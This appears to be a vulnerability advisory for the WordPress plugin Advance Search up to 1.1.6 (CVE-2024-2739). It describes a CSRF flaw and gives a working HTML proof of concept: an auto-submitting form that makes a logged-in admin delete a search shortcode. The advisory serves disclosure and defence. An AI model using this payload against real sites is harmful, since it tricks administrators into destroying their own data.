WordPress Plugin Vulnerabilities

Advance Search <= 1.1.6 - Shortcode Deletion via CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Make a logged in admin open the following HTML (replace `__FORM_ID__` with a valid ID):

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
        <input type="hidden" name="ajax_type" value="delete_search">
        <input type="hidden" name="security" value="123">
        <input type="hidden" name="form_id" value="__FORM_ID__">
        <input type="hidden" name="search_form_name" value="">
        <input type="submit" value="Submit Request">
</body>
```

The `security` field isn't validated and the shortcode is deleted.

Affects Plugins

Plugin icon
advance-search
No known fix

References

CVE
CVE-2024-2739

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
5b84145b-f94e-4ea7-84d5-56cf776817a2

Timeline

Publicly Published
2024-03-25 (about 1 months ago)
Added
2024-03-25 (about 1 months ago)
Last Updated
2024-03-25 (about 1 months ago)

Other

Published
Title
Published
2023-01-17
Title
WP Customer Area < 8.1.4 - Unauthorised Actions via CSRF
Published
2023-05-30
Title
Feather Login Page < 1.1.2 - Cross-Site Request Forgery to Privilege Escalation
Published
2023-08-21
Title
DX-auto-save-images <= 1.4.0 - CSRF
Published
2024-01-31
Title
Page Restrict <= 2.5.5 - Cross-Site Request Forgery via pr_admin_page
Published
2021-08-16
Title
Post Carousel < 2.3.5 - CSRF Bypass / Unauthorised AJAX Calls